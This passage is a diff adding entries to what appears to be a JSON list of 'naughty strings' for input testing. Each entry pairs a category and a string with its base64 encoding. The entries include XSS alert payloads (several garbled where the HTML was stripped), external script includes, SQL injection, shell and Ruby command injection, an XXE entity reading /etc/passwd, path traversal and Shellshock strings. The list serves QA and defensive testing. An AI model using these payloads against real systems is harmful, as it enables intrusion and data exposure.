+ "base64": "ImAnPjxzY3JpcHQ+XHgyMWphdmFzY3JpcHQ6YWxlcnQoMTU4KTwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDgyamF2YXNjcmlwdDphbGVydCgxNTkpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMlx4ODBceDg2amF2YXNjcmlwdDphbGVydCgxNjApPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhFMVx4QTBceDhFamF2YXNjcmlwdDphbGVydCgxNjEpPC9zY3JpcHQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHgwQmphdmFzY3JpcHQ6YWxlcnQoMTYyKTwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHgyMGphdmFzY3JpcHQ6YWxlcnQoMTYzKTwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "\"`'>",
+ "base64": "ImAnPjxzY3JpcHQ+XHhDMlx4QTBqYXZhc2NyaXB0OmFsZXJ0KDE2NCk8L3NjcmlwdD4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBceDAwc3JjPXggb25lcnJvcj0iYWxlcnQoMTY1KSI+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBceDQ3c3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNjYpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBceDExc3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNjcpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBceDEyc3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNjgpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZ1x4NDdzcmM9eCBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE2OSkiPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZ1x4MTBzcmM9eCBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE3MCkiPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZ1x4MTNzcmM9eCBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE3MSkiPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZ1x4MzJzcmM9eCBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE3MikiPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZ1x4NDdzcmM9eCBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE3MykiPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZ1x4MTFzcmM9eCBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE3NCkiPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBceDQ3c3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNzUpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBceDM0c3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNzYpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBceDM5c3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNzcpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBceDAwc3JjPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNzgpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBzcmNceDA5PXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxNzkpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBzcmNceDEwPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODApIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBzcmNceDEzPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODEpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBzcmNceDMyPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODIpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBzcmNceDEyPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODMpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBzcmNceDExPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODQpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBzcmNceDAwPXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODUpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZyBzcmNceDQ3PXggb25lcnJvcj0iamF2YXNjcmlwdDphbGVydCgxODYpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
\")
",
+ "base64": "PGltZyBzcmM9eFx4MDlvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE4NykiPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
\")
",
+ "base64": "PGltZyBzcmM9eFx4MTBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE4OCkiPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
\")
",
+ "base64": "PGltZyBzcmM9eFx4MTFvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE4OSkiPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
\")
",
+ "base64": "PGltZyBzcmM9eFx4MTJvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE5MCkiPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
\")
",
+ "base64": "PGltZyBzcmM9eFx4MTNvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDE5MSkiPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![]()
",
+ "base64": "PGltZ1thXVtiXVtjXXNyY1tkXT14W2Vdb25lcnJvcj1bZl0iYWxlcnQoMTkyKSI+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "

",
+ "base64": "PGltZyBzcmM9eCBvbmVycm9yPVx4MDkiamF2YXNjcmlwdDphbGVydCgxOTMpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "

",
+ "base64": "PGltZyBzcmM9eCBvbmVycm9yPVx4MTAiamF2YXNjcmlwdDphbGVydCgxOTQpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "

",
+ "base64": "PGltZyBzcmM9eCBvbmVycm9yPVx4MTEiamF2YXNjcmlwdDphbGVydCgxOTUpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "

",
+ "base64": "PGltZyBzcmM9eCBvbmVycm9yPVx4MTIiamF2YXNjcmlwdDphbGVydCgxOTYpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "

",
+ "base64": "PGltZyBzcmM9eCBvbmVycm9yPVx4MzIiamF2YXNjcmlwdDphbGVydCgxOTcpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "

",
+ "base64": "PGltZyBzcmM9eCBvbmVycm9yPVx4MDAiamF2YXNjcmlwdDphbGVydCgxOTgpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
XXX",
+ "base64": "PGEgaHJlZj1qYXZhJiMxJiMyJiMzJiM0JiM1JiM2JiM3JiM4JiMxMSYjMTJzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxOTkpPlhYWDwvYT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "

javascript:alert(200)\"` `>",
+ "base64": "PGltZyBzcmM9InhgIGA8c2NyaXB0PmphdmFzY3JpcHQ6YWxlcnQoMjAwKTwvc2NyaXB0PiJgIGA+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
![javascript:alert(201)//\"]()
",
+ "base64": "PGltZyBzcmMgb25lcnJvciAvIiAnIj0gYWx0PWphdmFzY3JpcHQ6YWxlcnQoMjAxKS8vIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
",
+ "base64": "PHRpdGxlIG9ucHJvcGVydHljaGFuZ2U9amF2YXNjcmlwdDphbGVydCgyMDIpPjwvdGl0bGU+PHRpdGxlIHRpdGxlPT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "![\"`]()
\">",
+ "base64": "PGEgaHJlZj1odHRwOi8vZm9vLmJhci8jeD1geT48L2E+PGltZyBhbHQ9ImA+PGltZyBzcmM9eDp4IG9uZXJyb3I9amF2YXNjcmlwdDphbGVydCgyMDMpPjwvYT4iPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "",
+ "base64": "PCEtLVtpZl0+PHNjcmlwdD5qYXZhc2NyaXB0OmFsZXJ0KDIwNCk8L3NjcmlwdCAtLT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "",
+ "base64": "PCEtLVtpZjxpbWcgc3JjPXggb25lcnJvcj1qYXZhc2NyaXB0OmFsZXJ0KDIwNSkvL10+IC0tPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "",
+ "base64": "PHNjcmlwdCBzcmM9Ii9cJShqc2NyaXB0KXMiPjwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "",
+ "base64": "PHNjcmlwdCBzcmM9IlxcJShqc2NyaXB0KXMiPjwvc2NyaXB0Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
\">",
+ "base64": "PElNRyAiIiI+PFNDUklQVD5hbGVydCgiMjA2Iik8L1NDUklQVD4iPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
",
+ "base64": "PElNRyBTUkM9amF2YXNjcmlwdDphbGVydChTdHJpbmcuZnJvbUNoYXJDb2RlKDUwLDQ4LDU1KSk+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
",
+ "base64": "PElNRyBTUkM9IyBvbm1vdXNlb3Zlcj0iYWxlcnQoJzIwOCcpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
",
+ "base64": "PElNRyBTUkM9IG9ubW91c2VvdmVyPSJhbGVydCgnMjA5JykiPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
",
+ "base64": "PElNRyBvbm1vdXNlb3Zlcj0iYWxlcnQoJzIxMCcpIj4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
",
+ "base64": "PElNRyBTUkM9JiMxMDY7JiM5NzsmIzExODsmIzk3OyYjMTE1OyYjOTk7JiMxMTQ7JiMxMDU7JiMxMTI7JiMxMTY7JiM1ODsmIzk3OyYjMTA4OyYjMTAxOyYjMTE0OyYjMTE2OyYjNDA7JiMzOTsmIzUwOyYjNDk7JiM0OTsmIzM5OyYjNDE7Pg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
",
+ "base64": "PElNRyBTUkM9JiMwMDAwMTA2JiMwMDAwMDk3JiMwMDAwMTE4JiMwMDAwMDk3JiMwMDAwMTE1JiMwMDAwMDk5JiMwMDAwMTE0JiMwMDAwMTA1JiMwMDAwMTEyJiMwMDAwMTE2JiMwMDAwMDU4JiMwMDAwMDk3JiMwMDAwMTA4JiMwMDAwMTAxJiMwMDAwMTE0JiMwMDAwMTE2JiMwMDAwMDQwJiMwMDAwMDM5JiMwMDAwMDUwJiMwMDAwMDQ5JiMwMDAwMDUwJiMwMDAwMDM5JiMwMDAwMDQxPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
",
+ "base64": "PElNRyBTUkM9JiN4NkEmI3g2MSYjeDc2JiN4NjEmI3g3MyYjeDYzJiN4NzImI3g2OSYjeDcwJiN4NzQmI3gzQSYjeDYxJiN4NkMmI3g2NSYjeDcyJiN4NzQmI3gyOCYjeDI3JiN4MzImI3gzMSYjeDMzJiN4MjcmI3gyOT4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
",
+ "base64": "PElNRyBTUkM9ImphdiDCoCBhc2NyaXB0OmFsZXJ0KCcyMTQnKTsiPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
",
+ "base64": "PElNRyBTUkM9ImphdiYjeDA5O2FzY3JpcHQ6YWxlcnQoJzIxNScpOyI+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
",
+ "base64": "PElNRyBTUkM9ImphdiYjeDBBO2FzY3JpcHQ6YWxlcnQoJzIxNicpOyI+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
",
+ "base64": "PElNRyBTUkM9ImphdiYjeDBEO2FzY3JpcHQ6YWxlcnQoJzIxNycpOyI+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "perl -e 'print \"
\";' > out",
+ "base64": "cGVybCAtZSAncHJpbnQgIjxJTUcgU1JDPWphdmFcMHNjcmlwdDphbGVydChcIjIxOFwiKT4iOycgPiBvdXQ="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "
",
+ "base64": "PElNRyBTUkM9IiAmIzE0OyDCoGphdmFzY3JpcHQ6YWxlcnQoJzIxOScpOyI+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "",
+ "base64": "PFNDUklQVC9YU1MgU1JDPSJodHRwOi8vaGEuY2tlcnMub3JnL3hzcy5qcyI+PC9TQ1JJUFQ+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "",
+ "base64": "PEJPRFkgb25sb2FkISMkJSYoKSp+Ky1fLiw6Oz9AWy98XF1eYD1hbGVydCgiMjIwIik+"
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "",
+ "base64": "PFNDUklQVC9TUkM9Imh0dHA6Ly9oYS5ja2Vycy5vcmcveHNzLmpzIj48L1NDUklQVD4="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "<",
+ "base64": "PDxTQ1JJUFQ+YWxlcnQoIjIyMSIpOy8vPDwvU0NSSVBUPg=="
+ },
+ {
+ "category": "Strings which attempt to invoke a benign script injection; shows vulnerability to XSS",
+ "string": "",
+ "base64": "PC90ZXh0YXJlYT48c2NyaXB0PmFsZXJ0KDIyNSk8L3NjcmlwdD4="
+ },
+ {
+ "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+ "string": "1;DROP TABLE users",
+ "base64": "MTtEUk9QIFRBQkxFIHVzZXJz"
+ },
+ {
+ "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+ "string": "1'; DROP TABLE users-- 1",
+ "base64": "MSc7IERST1AgVEFCTEUgdXNlcnMtLSAx"
+ },
+ {
+ "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+ "string": "' OR 1=1 -- 1",
+ "base64": "JyBPUiAxPTEgLS0gMQ=="
+ },
+ {
+ "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+ "string": "' OR '1'='1",
+ "base64": "JyBPUiAnMSc9JzE="
+ },
+ {
+ "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+ "string": "'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --",
+ "base64": "JzsgRVhFQyBzcF9NU0ZvckVhY2hUYWJsZSAnRFJPUCBUQUJMRSA/JzsgLS0="
+ },
+ {
+ "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+ "string": "%",
+ "base64": "JQ=="
+ },
+ {
+ "category": "Strings which can cause a SQL injection if inputs are not sanitized",
+ "string": "_",
+ "base64": "Xw=="
+ },
+ {
+ "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+ "string": "-",
+ "base64": "LQ=="
+ },
+ {
+ "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+ "string": "--",
+ "base64": "LS0="
+ },
+ {
+ "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+ "string": "--version",
+ "base64": "LS12ZXJzaW9u"
+ },
+ {
+ "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+ "string": "--help",
+ "base64": "LS1oZWxw"
+ },
+ {
+ "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+ "string": "$USER",
+ "base64": "JFVTRVI="
+ },
+ {
+ "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+ "string": "/dev/null; touch /tmp/blns.fail ; echo",
+ "base64": "L2Rldi9udWxsOyB0b3VjaCAvdG1wL2JsbnMuZmFpbCA7IGVjaG8="
+ },
+ {
+ "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+ "string": "`touch /tmp/blns.fail`",
+ "base64": "YHRvdWNoIC90bXAvYmxucy5mYWlsYA=="
+ },
+ {
+ "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+ "string": "$(touch /tmp/blns.fail)",
+ "base64": "JCh0b3VjaCAvdG1wL2JsbnMuZmFpbCk="
+ },
+ {
+ "category": "Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)",
+ "string": "@{[system \"touch /tmp/blns.fail\"]}",
+ "base64": "QHtbc3lzdGVtICJ0b3VjaCAvdG1wL2JsbnMuZmFpbCJdfQ=="
+ },
+ {
+ "category": "Strings which can call system commands within Ruby/Rails applications",
+ "string": "eval(\"puts 'hello world'\")",
+ "base64": "ZXZhbCgicHV0cyAnaGVsbG8gd29ybGQnIik="
+ },
+ {
+ "category": "Strings which can call system commands within Ruby/Rails applications",
+ "string": "System(\"ls -al /\")",
+ "base64": "U3lzdGVtKCJscyAtYWwgLyIp"
+ },
+ {
+ "category": "Strings which can call system commands within Ruby/Rails applications",
+ "string": "`ls -al /`",
+ "base64": "YGxzIC1hbCAvYA=="
+ },
+ {
+ "category": "Strings which can call system commands within Ruby/Rails applications",
+ "string": "Kernel.exec(\"ls -al /\")",
+ "base64": "S2VybmVsLmV4ZWMoImxzIC1hbCAvIik="
+ },
+ {
+ "category": "Strings which can call system commands within Ruby/Rails applications",
+ "string": "Kernel.exit(1)",
+ "base64": "S2VybmVsLmV4aXQoMSk="
+ },
+ {
+ "category": "Strings which can call system commands within Ruby/Rails applications",
+ "string": "%x('ls -al /')",
+ "base64": "JXgoJ2xzIC1hbCAvJyk="
+ },
+ {
+ "category": "String which can reveal system files when parsed by a badly configured XML parser",
+ "string": "]>
&xxe;",
+ "base64": "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PjwhRE9DVFlQRSBmb28gWyA8IUVMRU1FTlQgZm9vIEFOWSA+PCFFTlRJVFkgeHhlIFNZU1RFTSAiZmlsZTovLy9ldGMvcGFzc3dkIiA+XT48Zm9vPiZ4eGU7PC9mb28+"
+ },
+ {
+ "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+ "string": "$HOME",
+ "base64": "JEhPTUU="
+ },
+ {
+ "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+ "string": "$ENV{'HOME'}",
+ "base64": "JEVOVnsnSE9NRSd9"
+ },
+ {
+ "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+ "string": "%d",
+ "base64": "JWQ="
+ },
+ {
+ "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+ "string": "%s%s%s%s%s",
+ "base64": "JXMlcyVzJXMlcw=="
+ },
+ {
+ "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+ "string": "{0}",
+ "base64": "ezB9"
+ },
+ {
+ "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+ "string": "%*.*s",
+ "base64": "JSouKnM="
+ },
+ {
+ "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+ "string": "%@",
+ "base64": "JUA="
+ },
+ {
+ "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+ "string": "%n",
+ "base64": "JW4="
+ },
+ {
+ "category": "Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.",
+ "string": "File:///",
+ "base64": "RmlsZTovLy8="
+ },
+ {
+ "category": "Strings which can cause user to pull in files that should not be a part of a web server",
+ "string": "../../../../../../../../../../../etc/passwd%00",
+ "base64": "Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA=="
+ },
+ {
+ "category": "Strings which can cause user to pull in files that should not be a part of a web server",
+ "string": "../../../../../../../../../../../etc/hosts",
+ "base64": "Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2hvc3Rz"
+ },
+ {
+ "category": "Strings that test for known vulnerabilities",
+ "string": "() { 0; }; touch /tmp/blns.shellshock1.fail;",
+ "base64": "KCkgeyAwOyB9OyB0b3VjaCAvdG1wL2JsbnMuc2hlbGxzaG9jazEuZmFpbDs="
+ },
+ {
+ "category": "Strings that test for known vulnerabilities",
+ "string": "() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }",
+ "base64": "KCkgeyBfOyB9ID5fWyQoJCgpKV0geyB0b3VjaCAvdG1wL2JsbnMuc2hlbGxzaG9jazIuZmFpbDsgfQ=="
+ },
+ {
+ "category": "Strings that test for known vulnerabilities",
+ "string": "<<< %s(un='%s') = %u",
+ "base64": "PDw8ICVzKHVuPSclcycpID0gJXU="
+ },
+ {
+ "category": "Strings that test for known vulnerabilities",
+ "string": "+++ATH0",
+ "base64": "KysrQVRIMA=="
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "CON",
+ "base64": "Q09O"
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "PRN",
+ "base64": "UFJO"
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "AUX",
+ "base64": "QVVY"
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "CLOCK$",
+ "base64": "Q0xPQ0sk"
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "NUL",
+ "base64": "TlVM"
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "A:",
+ "base64": "QTo="
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "ZZ:",
+ "base64": "Wlo6"
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "COM1",
+ "base64": "Q09NMQ=="
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "LPT1",
+ "base64": "TFBUMQ=="
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "LPT2",
+ "base64": "TFBUMg=="
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "LPT3",
+ "base64": "TFBUMw=="
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "COM2",
+ "base64": "Q09NMg=="
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "COM3",
+ "base64": "Q09NMw=="
+ },
+ {
+ "category": "Strings which are reserved characters in MSDOS/Windows",
+ "string": "COM4",
+ "base64": "Q09NNA=="
+ },
+ {
+ "category": "Strings that may occur on IRC clients that make security products freak out",
+ "string": "DCC SEND STARTKEYLOGGER 0 0 0",
+ "base64": "RENDIFNFTkQgU1RBUlRLRVlMT0dHRVIgMCAwIDA="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "Scunthorpe General Hospital",
+ "base64": "U2N1bnRob3JwZSBHZW5lcmFsIEhvc3BpdGFs"
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "Penistone Community Church",
+ "base64": "UGVuaXN0b25lIENvbW11bml0eSBDaHVyY2g="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "Lightwater Country Park",
+ "base64": "TGlnaHR3YXRlciBDb3VudHJ5IFBhcms="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "Jimmy Clitheroe",
+ "base64": "SmltbXkgQ2xpdGhlcm9l"
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "Horniman Museum",
+ "base64": "SG9ybmltYW4gTXVzZXVt"
+ },
+ {
